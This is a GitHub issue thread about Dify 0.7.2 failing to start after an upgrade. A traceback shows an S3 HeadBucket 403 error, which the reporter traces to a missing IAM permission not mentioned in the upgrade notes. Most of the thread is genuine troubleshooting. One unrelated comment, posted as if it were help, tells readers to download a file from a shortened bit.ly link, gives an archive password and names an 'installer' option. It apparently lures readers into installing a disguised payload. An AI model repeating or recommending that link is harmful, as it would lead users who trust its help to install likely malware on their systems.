### ISSUE TITLE
Unable to open after updating 0.7.2

### ISSUE THREAD

**Issue by lichao4Java** [langgenius/dify#7724]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.2

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

i am using Docker compose deployments  
After updating to 0.7.2 and starting Docker, it cannot be opened dify. Docker Web has an error message, found a large number of 502 requests after checking the browser console, such as: /console/api/apps?page=1&limit=30&name= Return to 502

I am using S3 for storage, and there have been no changes when updating the version Env configuration

docker-web   The error log is as follows:

 
![image](https://github.com/user-attachments/assets/799431cd-e909-49d3-b9e1-815483b8a7ea)

I found that this issue is related to this commit. Please check if there are any errors：

https://github.com/langgenius/dify/commit/0006c6f0fdaeca5df7cc03a8e806943c625d6e7e

### ✔️ Expected Behavior

Start dify normally after upgrading

### ❌ Actual Behavior

Unable to open dify after upgrading, found a large number of 502 requests after checking the browser console

**Comment by lichao4Java** [comment]
My previous version ran without any issues, including updates from previous versions. Why does this update require so many extra operations?


I found that this issue is related to this commit. Please check if there are any errors：


https://github.com/langgenius/dify/commit/0006c6f0fdaeca5df7cc03a8e806943c625d6e7e

**Comment by lichao4Java** [comment]
File "/app/api/app.py", line 155, in initialize_extensions
    ext_storage.init_app(app)
  File "/app/api/extensions/ext_storage.py", line 65, in init_app
    storage.init_app(app)
  File "/app/api/extensions/ext_storage.py", line 22, in init_app
    self.storage_runner = S3Storage(app=app)
  File "/app/api/extensions/storage/s3_storage.py", line 33, in __init__
    self.client.head_bucket(Bucket=self.bucket_name)
  File "/app/api/.venv/lib/python3.10/site-packages/botocore/client.py", line 565, in _api_call
    return self._make_api_call(operation_name, kwargs)
  File "/app/api/.venv/lib/python3.10/site-packages/botocore/client.py", line 1017, in _make_api_call
    raise error_class(parsed_response, operation_name)
botocore.exceptions.ClientError: An error occurred (403) when calling the HeadBucket operation: Forbidden


error is "botocore.exceptions.ClientError: An error occurred (403) when calling the HeadBucket operation: Forbidden" 

point this commit https://github.com/langgenius/dify/commit/0006c6f0fdaeca5df7cc03a8e806943c625d6e7e  

 File "/app/api/extensions/storage/s3_storage.py", line 33
 
![image](https://github.com/user-attachments/assets/ce30dd23-5020-4d8d-b713-7a9532d98fab)


Has this commit been tested?

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lichao4Java** [comment]
I have confirmed that it is an IAM permission issue with S3. There is no indication in the upgrade document that new permissions need to be added. I suggest that additional operations involved in future version upgrades be listed. Thank you

**Comment by crazywoola** [comment]
@moyueheng Can you take a look at this?

**Comment by moyueheng** [comment]
> @moyueheng Can you take a look at this?

Certainly, I'd be happy to take a look.
